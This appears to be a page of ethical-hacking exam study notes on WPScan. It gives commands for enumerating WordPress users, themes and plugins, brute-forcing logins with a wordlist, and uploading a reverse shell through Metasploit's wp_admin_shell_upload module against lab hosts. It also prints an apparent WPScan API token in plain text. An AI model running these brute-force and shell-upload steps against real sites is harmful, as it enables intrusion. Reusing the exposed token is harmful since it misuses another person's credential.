Practical CEH Notes & Tools
HomeGitHubPortfolioTwitter/XMediumCont@ct
  • ๐Ÿ““Practical Ethical Hacker Notes
    • ๐Ÿ“šMain Contents
      • 2 - Footprinting & Recon
      • 3 - Scanning Networks
      • 4 - Enumeration
      • 5 - Vulnerability Analysis
      • 6 - System Hacking
      • 7 - Malware
      • 8 - Sniffing
      • 10 - DoS
      • 11 - Session Hijacking
      • 13 - Hacking Web Servers
      • 14 - Hacking Web Apps
      • 15 - SQL Injection
      • 16 - Hacking Wireless
      • 17 - Hacking Mobile
      • 18 - IoT and OT Hacking
      • 19 - Cloud Computing
      • 20 - Cryptography
    • ๐Ÿ‘จโ€๐ŸŽ“Study Walkthrough
      • ๐ŸงชLabs and Training
    • Tools ๐Ÿ› ๏ธ
      • ๐Ÿค–Adb tool
      • ๐Ÿ”BCTextEncoder
      • ๐ŸŸงBurp Suite
      • ๐Ÿ‘จโ€๐Ÿ’ปCewl
      • ๐Ÿ“Crunch
      • ๐Ÿ—ƒ๏ธDirb
      • ๐ŸงEnum4linux
      • ๐Ÿ”—Gobuster
      • ๐Ÿ”“Hashcalc
      • ๐Ÿ˜บHashcat
      • ๐Ÿ‘‰Hping3
      • ๐Ÿ‰Hydra
      • ๐ŸฅทJohn the Ripper
      • โ“‚๏ธMetasploit
      • 5๏ธโƒฃMd5 Calculator
      • ๐Ÿ‘ฝNikto
      • ๐Ÿ‘๏ธNmap
      • ๐Ÿ–ผ๏ธOpenstego
      • ๐ŸŽจQuickStego
      • ๐ŸŒˆRainbowCrack
      • โ†—๏ธResponder LLMNR
      • ๐Ÿ•ท๏ธSearchsploit
      • โ›„Snow
      • ๐ŸŒ€Stego
      • ๐Ÿ’‰SQLMap
      • โš™๏ธSteghide
      • โš—๏ธStegimage
      • ๐Ÿ”‘Veracrypt
      • ๐ŸฆˆWireshark or Tcpdump
      • ๐Ÿ”WPScan
      • โšกZap
Powered by GitBook
On this page
  • Enumerate and hack a web app using wpscan and metasploit
  • Additional Resources
  1. Practical Ethical Hacker Notes
  2. Tools ๐Ÿ› ๏ธ

WPScan

https://www.kali.org/tools/wpscan/

wpscan -h #List WPscan Parameters
wpscan --update #Update WPscan

#Enumerate WordPress using WPscan


wpscan --url "http://<TARGET_IP>" -e t #All Themes Installed

wpscan --url "http://<TARGET_IP>" -e vt #Vulnerable Themes Installed

wpscan --url "http://<TARGET_IP>"  -e p #All Plugins Installed

wpscan --url "http://<TARGET_IP>"  -e vp #Vulnerable Themes Installed

wpscan --url "http://<TARGET_IP>"  -e u #WordPress Users

wpscan --url "http://<TARGET_IP>"  --passwords path-to-wordlist #Brute Force WordPress Passwords

#Upload Reverse Shell to WordPress
http://<IP>/wordpress/wp-content/themes/twentyfifteen/404.php

#Upload using Metasploit
msf > use exploit/unix/webapp/wp_admin_shell_upload
msf exploit(wp_admin_shell_upload) > set USERNAME admin
msf exploit(wp_admin_shell_upload) > set PASSWORD admin
msf exploit(wp_admin_shell_upload) > set targeturi /wordpress
msf exploit(wp_admin_shell_upload) > exploit
#User Enumeration
wpscan --url https://example/ --enumerate u

#Bruteforce
wpscan --url https://example/ --passwords wordlist.txt --usernames samson

Enumerate and hack a web app using wpscan and metasploit

  • โ€” enumerate u: Specify the enumeration of users

  • Mine: hWt9qrMZFm7MKprTWcjdasowoQZ7yMccyPg8lsb8ads

  • service postgresql start

  • msfconsole

  • use auxiliary/scanner/http/wordpress_login_enum

  • show options

  • set PASS_FILE password.txt

  • set RHOST 10.10.10.16

  • set RPORT 8080

  • set USERNAME admin

  • run

  • Find the credential

Additional Resources

PreviousWireshark or TcpdumpNextZap

Last updated 1 year ago

wpscan โ€” api-token hWt9qrMZFm7MKprTWcjdasowoQZ7yMccyPg8lsb8ads โ€” url โ€” plugins-detection aggressive โ€” enumerate u

API Token: Register at

set TARGETURI

๐Ÿ““
๐Ÿ”
http://10.10.10.16:8080/CEH
https://wpscan.com/register
http://10.10.10.16:8080/CEH
wpscan | Kali Linux ToolsKali Linux
wpscan Tool in Kali Linux - GeeksforGeeksGeeksforGeeks
WPScan Intro: How to Scan for WordPress VulnerabilitiesSucuri Blog
How to hack a WordPress website with WPScanHacking Tutorials
How to use WPScan to easily find your wordpress site vulnerabilities
Checking the Password Strength of WordPress Users with WPScanWP White Security
Logo
Logo
Logo
Logo
Logo
Logo